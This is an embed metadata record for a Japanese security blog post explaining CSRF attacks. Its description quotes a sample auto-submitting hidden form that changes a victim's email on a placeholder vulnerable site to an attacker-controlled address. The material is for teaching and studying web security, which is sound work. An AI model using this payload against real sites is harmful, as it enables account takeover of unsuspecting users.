{"height":"190","title":"How CSRF Works (Final Chapter): The Process by Which the Damage Occurs and Applied Cases Beyond Cookies","provider_url":"https://hatena.blog","version":"1.0","url":"https://cysec148.hatenablog.com/entry/2025/05/19/161713","categories":["Web Security Academy","CSRF"],"author_name":"ThisIsOne","provider_name":"Hatena Blog","published":"2025-05-19 16:17:13","type":"rich","width":"100%","blog_url":"https://cysec148.hatenablog.com/","author_url":"https://blog.hatena.ne.jp/ThisIsOne/","image_url":null,"blog_title":"Shikata Ga Nai","description":"Hello there, ('\u03c9')\u30ce \u2705 What happens when the victim visits the attacker's page? When the victim accesses a page containing HTML crafted by the attacker: 1\ufe0f\u20e3 The attack page triggers an HTTP request <form action=\"https://vulnerable-website.com/email/change\" method=\"POST\"> <input type=\"hidden\" name=\"email\" value=\"pwned@evil-user.net\" /> </form> <script> document.forms[0].submit(); </script> \u2192 J\u2026","html":"<iframe src=\"https://hatenablog-parts.com/embed?url=https%3A%2F%2Fcysec148.hatenablog.com%2Fentry%2F2025%2F05%2F19%2F161713\" title=\"How CSRF Works (Final Chapter): The Process by Which the Damage Occurs and Applied Cases Beyond Cookies - Shikata Ga Nai\" class=\"embed-card embed-blogcard\" scrolling=\"no\" frameborder=\"0\" style=\"display: block; width: 100%; height: 190px; max-width: 500px; margin: 10px 0px;\"></iframe>"}